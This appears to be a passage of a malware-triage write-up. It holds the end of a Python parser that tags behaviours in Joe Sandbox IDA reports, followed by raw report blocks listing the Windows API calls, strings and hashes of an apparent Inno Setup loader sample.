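        line = raw.strip()
        if line == "APIs":                 # every function block opens with this header
            cur = Function()
            funcs.append(cur)
        elif cur is None or not line.startswith("•"):
            continue                       # bare section headers carry no data
        else:
            body, via = line.lstrip("•").strip(), None
            if (m := SUBCALL_RE.match(body)):
                via, body = m["fn"], m["rest"]
            if (m := API_RE.match(body)):
                args = m["args"].split(",") if m["args"] is not None else []
                cur.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), via))
            elif (m := FIELD_RE.match(body)):
                cur.fields[m["key"]] = m["val"]
                if m["key"] == "String ID" and m["val"]:
                    # The report joins strings with '$'; a string that contains '$' itself
                    # (the /SL5="$%x,%d,%d, format string) cannot be rejoined from here.
                    cur.strings = m["val"].split("$")
    return funcs

def triage(fn: Function) -> list[str]:
    # Behaviour tags for one function, in a fixed order so output stays diffable.
    tags: list[str] = []
    direct = {c.api for c in fn.calls if c.via is None}
    every = {c.api for c in fn.calls}
    if "GetProcAddress" in direct:       # String IDs shaped like export names are the targets
        names = [s for s in fn.strings if re.fullmatch(r"[A-Za-z_]\w*", s)]
        tags.append("dynamic-import:" + ",".join(names))
    if any(a.startswith("CreateProcess") for a in every):
        tags.append("spawns-process")
    if "InnoSetupLdrWindow" in fn.strings or any(s.startswith("/SL5=") for s in fn.strings):
        tags.append("inno-setup-loader")
    if any(s.startswith("Wow64") for s in fn.strings):
        tags.append("wow64-fs-redirection")
    tags += ["unresolved-import:" + a for a in sorted(every) if re.fullmatch(r"[0-9A-F]{8}", a)]
    return tags

def summarize(text: str) -> list[tuple[str, list[str]]]:
    # (first 8 hex digits of the Opcode ID, tags) per function: a quick pivot table.
    return [(fn.fields.get("Opcode ID", "")[:8], triage(fn)) for fn in parse_report(text)]

if __name__ == "__main__":
    for opcode_id, tags in summarize(SAMPLE):
        print(opcode_id, ", ".join(tags) or "-")
```

Run directly it prints one row per block; `summarize` returns the same rows for scripting. Two caveats for anyone extending it: the `$` separator in `String ID` is ambiguous whenever a recovered string itself contains `$`, so the `/SL5="$%x,%d,%d,` format string above comes out as two pieces, and the `API ID` and `API String ID` values are similarity keys computed by the sandbox, which the parser stores verbatim rather than interpreting.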

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetLastError.KERNEL32 ref: 0040A0F4
                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02137C50), ref: 0040966C
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                          • SetWindowLongA.USER32(00020464,000000FC,00409918), ref: 0040A148
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                          • 73A15CF0.USER32(00020464,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 3341979996-3001827809
                                                                          • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                          • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                          • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                          • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                          • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                          • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                          • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                          • SetWindowLongA.USER32(00020464,000000FC,00409918), ref: 0040A148
                                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                            • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90,00000000), ref: 00409A28
                                                                            • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                            • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90), ref: 00409A5C
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                          • 73A15CF0.USER32(00020464,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 978128352-3001827809
                                                                          • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                          • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                          • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                          • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90,00000000), ref: 00409A28
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90), ref: 00409A5C
                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02137C50), ref: 0040966C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                          • String ID: D
                                                                          • API String ID: 3356880605-2746444292
                                                                          • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                          • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                          • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                          • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: .tmp$y@
                                                                          • API String ID: 2030045667-2396523267
                                                                          • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                          • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                          • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                          • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: .tmp$y@
                                                                          • API String ID: 2030045667-2396523267
                                                                          • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                          • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                          • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                          • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: .tmp
                                                                          • API String ID: 1375471231-2986845003
                                                                          • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                          • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                          • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                          • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                          Control-flow Graph (legend: Executed / Not Executed)

                                                                          control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 333 40778a-40778f 330->333 334 4077fd-407802 330->334 335 40783b-40783d 331->335 336 4077fb 331->336 338 407803-407819 333->338 340 407791-407792 333->340 334->338 339 407841-407843 335->339 336->334 341 40785b-40785c 338->341 349 40781b 338->349 339->341 342 407724-407741 340->342 343 407794-4077b4 340->343 345 4078d6-4078eb call 407890 InterlockedExchange 341->345 346 40785e-40788c 341->346 348 4077b5 342->348 350 407743 342->350 343->348 366 407912-407917 345->366 367 4078ed-407910 345->367 359 407820-407823 346->359 360 407890-407893 346->360 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->335 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->335 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                          • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                          • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                          • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                          Control-flow Graph (legend: Executed / Not Executed)

                                                                          control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                          • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                          • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                          • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

Control-flow Graph
control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
• GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021203AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
• Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

Control-flow Graph
control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
APIs
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
• Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

Control-flow Graph
control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
• GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021203AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
• Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
• Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
  • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
• Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
• Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
• Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
• Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
• Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
